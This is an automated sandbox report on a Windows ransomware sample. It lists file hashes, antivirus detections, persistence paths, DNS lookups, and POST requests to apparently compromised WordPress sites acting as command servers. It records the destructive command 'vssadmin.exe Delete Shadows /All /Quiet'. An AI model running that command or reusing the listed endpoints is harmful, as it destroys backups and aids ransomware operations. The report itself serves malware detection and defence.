Analysis Date2015-10-30 07:07:47
MD505d4b5f5d1d644934d789b7f68d4ea12
SHA171e7af40613099d7b83820f2137c4978d89d1be5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 62eae76e7a3f8f0608ada86723a3f3a6 sha1: f7ff744536871c4264ca616b276b904d07e32d6d size: 105984
Section.rdata md5: c71bb52f20b2ea55de8f347467be7052 sha1: e52bf98ab7297be7d6d34a3369f3c014f8d38370 size: 40448
Section.data md5: 6b8e71bd0e88577b56ff65124f7c861f sha1: 241239757e753af9d7e73219094703a1c29ed50b size: 36352
Section.rsrc md5: 383feebc8fd8b20a8b5df3bff00bcd41 sha1: 4054d22b3c720e37e03f5847c60cd64c721f81c7 size: 116224
Timestamp2015-10-20 09:52:21
PackerMicrosoft Visual C++ ?.?
PEhashd9a32b9f186b9ca6bd2ab590fb9779c55bf4230b
IMPhash61169341108e3c5723f9c4f3b06bf2e9
AVCA (E-Trust Ino)no_virus
AVF-SecureTrojan.GenericKD.2811394
AVDr. WebTrojan.DownLoad3.35944
AVClamAVno_virus
AVArcabit (arcavir)Trojan.GenericKD.2811394
AVBullGuardTrojan.GenericKD.2811394
AVPadvishno_virus
AVVirusBlokAda (vba32)Backdoor.Androm
AVCAT (quickheal)no_virus
AVTrend Microno_virus
AVKasperskyTrojan-Ransom.Win32.Cryptodef.aahc
AVZillya!no_virus
AVEmsisoftTrojan.GenericKD.2811394
AVIkarusTrojan.Win32.Crypt
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVMalwareBytesRansom.CryptoWall
AVMicroWorld (escan)Trojan.GenericKD.2811394
AVMicrosoft Security EssentialsVirTool:Win32/CeeInject.LJ
AVK7Trojan ( 004cef571 )
AVBitDefenderTrojan.GenericKD.2811394
AVFortinetW32/Kryptik.EASA!tr
AVSymantecno_virus
AVGrisoft (avg)Crypt_r.AFK
AVEset (nod32)Win32/Injector.BNHS
AVAlwil (avast)Androp [Drp]
AVAd-AwareTrojan.GenericKD.2811394
AVRisingno_virus
AVTwisterno_virus
AVAvira (antivir)TR/Crypt.ZPACK.196051
AVMcafeeGamarue-FDC!05D4B5F5D1D6

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process-k netsvcs
Creates Processvssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSobjetivografico.es
Winsock DNSbono.by
Winsock DNSshugrmedia.com
Winsock DNSdivinemodels.ru
Winsock DNSaye2zee.biz
Winsock DNSpositivefxstudio.co.uk
Winsock DNSdkforma.ru
Winsock DNSsoftware-select.nl
Winsock DNSifloresti.ro
Winsock DNScurlmyip.com
Winsock DNSpamperedpetsgroomingacademy.co.uk
Winsock DNSxn--80auckeg1db2a.xn--p1ai
Winsock DNSpeegas.ru
Winsock DNSz-en.ru
Winsock DNSvoteforbrendan.us
Winsock DNSbestinyourtown.info
Winsock DNSberattv.com.tr
Winsock DNSmyexternalip.com
Winsock DNSbursauygulamaoteli.com
Winsock DNSqrcp.us
Winsock DNSip-addr.es
Winsock DNSathleticequine.org.nz
Winsock DNSgarlanddeli.com
Winsock DNSnewconsult.by
Winsock DNSvoteforbrendan.mobi
Winsock DNSmartinelacasse.ca
Winsock DNSdirecttrailer.us
Winsock DNSproductprovider.nl
Winsock DNSvoteforbrendan.info
Winsock DNSmetroloto.ru
Winsock DNSrostbiznesa.ru
Winsock DNSopportunitycup.com
Winsock DNSvoteforbrendan.biz
Winsock DNScapodimonte.ua
Winsock DNSvoteforbrendan.me
Winsock DNSelectrosim.ro

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSrostbiznesa.ru
Type: A
92.53.114.211
DNSelectrosim.ro
Type: A
37.156.37.11
DNSpeegas.ru
Type: A
176.57.216.209
DNSxn--80auckeg1db2a.xn--p1ai
Type: A
194.85.61.76
DNSxn--80auckeg1db2a.xn--p1ai
Type: A
109.70.26.37
DNSpamperedpetsgroomingacademy.co.uk
Type: A
192.254.187.55
DNSopportunitycup.com
Type: A
192.185.29.132
DNSproductprovider.nl
Type: A
37.153.204.79
DNSathleticequine.org.nz
Type: A
182.50.130.37
DNSdivinemodels.ru
Type: A
5.9.23.71
DNSvoteforbrendan.me
Type: A
67.23.254.89
DNSbestinyourtown.info
Type: A
192.185.157.29
DNSmetroloto.ru
Type: A
89.207.89.233
DNSobjetivografico.es
Type: A
192.185.14.142
DNSpositivefxstudio.co.uk
Type: A
88.208.252.82
DNSberattv.com.tr
Type: A
185.33.128.131
DNSbono.by
Type: A
91.149.157.185
DNSdkforma.ru
Type: A
195.19.214.27
DNSvoteforbrendan.biz
Type: A
67.23.254.89
DNSsoftware-select.nl
Type: A
37.128.147.21
DNSifloresti.ro
Type: A
176.126.201.10
DNSvoteforbrendan.info
Type: A
67.23.254.89
DNSvoteforbrendan.mobi
Type: A
67.23.254.89
DNSmartinelacasse.ca
Type: A
192.185.79.75
DNScapodimonte.ua
Type: A
188.95.154.41
DNSaye2zee.biz
Type: A
192.185.198.153
DNSvoteforbrendan.us
Type: A
67.23.254.89
DNSbursauygulamaoteli.com
Type: A
89.106.12.62
DNSgarlanddeli.com
Type: A
192.185.48.207
DNSshugrmedia.com
Type: A
184.168.193.215
DNSz-en.ru
Type: A
185.58.207.147
DNSnewconsult.by
Type: A
93.125.99.68
DNSdirecttrailer.us
Type: A
69.89.31.160
DNSqrcp.us
Type: A
198.57.246.6
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://rostbiznesa.ru/wp-content/plugins/tw-recent-posts-widget/d30UGa.php?g=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://electrosim.ro/wp-content/plugins/contact-form-7/CwR04H.php?g=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://peegas.ru/wp-content/themes/twentytwelve/6x_nV5.php?v=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://rostbiznesa.ru/wp-content/plugins/tw-recent-posts-widget/ILEKUM.php?b=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://xn--80auckeg1db2a.xn--p1ai/wp-content/plugins/shortcodes-ultimate/hntNzB.php?p=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pamperedpetsgroomingacademy.co.uk/wp-content/plugins/slideshow-jquery-image-gallery/7sinRu.php?k=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://opportunitycup.com/media/editors/tinymce/jscripts/tiny_mce/plugins/contextmenu/InyfWv.php?v=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://productprovider.nl/wp-content/uploads/genesis-extender/plugin/images/HaryfG.php?f=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://athleticequine.org.nz/wp-content/themes/poloraytheme/functions/HdIC_W.php?k=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://divinemodels.ru/tmp/install_534f08d496bdb/tinymce/js/tinymce/plugins/bbcode/GAwCYO.php?o=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://voteforbrendan.me/wp-content/themes/twentyfourteen/pYE7yW.php?n=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bestinyourtown.info/wp-content/themes/toommoreltheme/_pH5Ck.php?e=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://peegas.ru/wp-content/themes/twentytwelve/uQYbdq.php?j=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://metroloto.ru/wp-content/themes/Velluce/IzOSnD.php?s=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://objetivografico.es/wp-content/themes/book-store%20backup/BhRfIp.php?f=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://positivefxstudio.co.uk/wp-content/themes/spacious/DiJv3L.php?u=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://berattv.com.tr/wp-content/plugins/newsletter/4dMplH.php?j=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bono.by/wp-content/plugins/akismet/O_xjRv.php?l=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dkforma.ru/wp-content/themes/dk/Sp6u0B.php?q=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://voteforbrendan.biz/wp-content/themes/twentyfifteen/pLXtNm.php?t=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://software-select.nl/wp-content/themes/genesis/qMfFUp.php?b=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ifloresti.ro/wp-content/plugins/navayan-subscribe/SYbJT9.php?c=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://voteforbrendan.info/wp-content/themes/genesis/t58Esq.php?h=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://voteforbrendan.mobi/wp-content/plugins/contact-form-7/t1TrNk.php?r=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://martinelacasse.ca/wp-content/plugins/symple-shortcodes/EmATUG.php?w=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://capodimonte.ua/wp-content/plugins/cherry-plugin/D3sOjY.php?v=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aye2zee.biz/wp-content/plugins/max-banner-ads-pro/5Yfhdr.php?z=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://voteforbrendan.us/wp-content/plugins/wordpress-importer/NyUkLc.php?d=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bursauygulamaoteli.com/wp-content/themes/welcome_inn-parent/framework/extensions/contactform/static/VNtDfl.php?d=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://garlanddeli.com/media/editors/tinymce/jscripts/tiny_mce/plugins/paste/GbWzVt.php?v=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://shugrmedia.com/wp-content/uploads/2015/09/9rjMyJ.php?b=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://z-en.ru/wp-content/plugins/wp-lightbox-2/107iNE.php?i=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://newconsult.by/wp-content/plugins/all-in-one-seo-pack/JqT9Ls.php?x=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://directtrailer.us/wp-content/plugins/advanced-excerpt/1VtP3W.php?n=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bono.by/wp-content/plugins/akismet/4BWtIF.php?j=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://qrcp.us/wp-content/themes/twentyfifteen/Bamzho.php?f=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://capodimonte.ua/wp-content/plugins/cherry-plugin/PLlfEN.php?p=gsgxs36kuqck
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 92.53.114.211:80
Flows TCP192.168.1.1:1035 ➝ 37.156.37.11:80
Flows TCP192.168.1.1:1036 ➝ 176.57.216.209:80
Flows TCP192.168.1.1:1037 ➝ 92.53.114.211:80
Flows TCP192.168.1.1:1038 ➝ 194.85.61.76:80
Flows TCP192.168.1.1:1039 ➝ 192.254.187.55:80
Flows TCP192.168.1.1:1040 ➝ 192.185.29.132:80
Flows TCP192.168.1.1:1041 ➝ 37.153.204.79:80
Flows TCP192.168.1.1:1042 ➝ 182.50.130.37:80
Flows TCP192.168.1.1:1043 ➝ 5.9.23.71:80
Flows TCP192.168.1.1:1044 ➝ 67.23.254.89:80
Flows TCP192.168.1.1:1045 ➝ 192.185.157.29:80
Flows TCP192.168.1.1:1046 ➝ 176.57.216.209:80
Flows TCP192.168.1.1:1047 ➝ 89.207.89.233:80
Flows TCP192.168.1.1:1048 ➝ 192.185.14.142:80
Flows TCP192.168.1.1:1049 ➝ 88.208.252.82:80
Flows TCP192.168.1.1:1050 ➝ 185.33.128.131:80
Flows TCP192.168.1.1:1051 ➝ 91.149.157.185:80
Flows TCP192.168.1.1:1052 ➝ 195.19.214.27:80
Flows TCP192.168.1.1:1053 ➝ 67.23.254.89:80
Flows TCP192.168.1.1:1054 ➝ 37.128.147.21:80
Flows TCP192.168.1.1:1055 ➝ 176.126.201.10:80
Flows TCP192.168.1.1:1056 ➝ 67.23.254.89:80
Flows TCP192.168.1.1:1057 ➝ 67.23.254.89:80
Flows TCP192.168.1.1:1058 ➝ 192.185.79.75:80
Flows TCP192.168.1.1:1059 ➝ 188.95.154.41:80
Flows TCP192.168.1.1:1060 ➝ 192.185.198.153:80
Flows TCP192.168.1.1:1061 ➝ 67.23.254.89:80
Flows TCP192.168.1.1:1062 ➝ 89.106.12.62:80
Flows TCP192.168.1.1:1063 ➝ 192.185.48.207:80
Flows TCP192.168.1.1:1064 ➝ 184.168.193.215:80
Flows TCP192.168.1.1:1065 ➝ 185.58.207.147:80
Flows TCP192.168.1.1:1066 ➝ 93.125.99.68:80
Flows TCP192.168.1.1:1067 ➝ 69.89.31.160:80
Flows TCP192.168.1.1:1068 ➝ 91.149.157.185:80
Flows TCP192.168.1.1:1069 ➝ 198.57.246.6:80
Flows TCP192.168.1.1:1070 ➝ 188.95.154.41:80

Raw Pcap

Strings